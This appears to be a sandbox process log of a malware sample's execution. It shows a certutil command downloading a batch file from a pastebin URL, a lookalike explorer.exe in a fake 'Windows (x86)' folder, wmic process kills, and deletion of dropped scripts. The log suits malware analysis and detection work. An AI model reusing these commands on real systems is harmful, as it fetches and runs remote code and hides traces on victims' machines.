cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\E474.tmp\E475.bat "C:\Windows (x86)\xagal.exe""
2076certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/GUqDzHQW "C:\Windows (x86)\version.bat"
2152cmd.exe cmd /c del "C:\Windows (x86)\version.bat"
2284cmd.exe C:\Windows\system32\cmd.exe /c wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
2420WMIC.exe wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
2452WMIC.exe wmic process where name='xagal.exe' delete
2024explorer.exe "C:\Windows (x86)\explorer.exe"
2184cmd.exe cmd /c del "C:\Windows (x86)\xcls.bat"
2444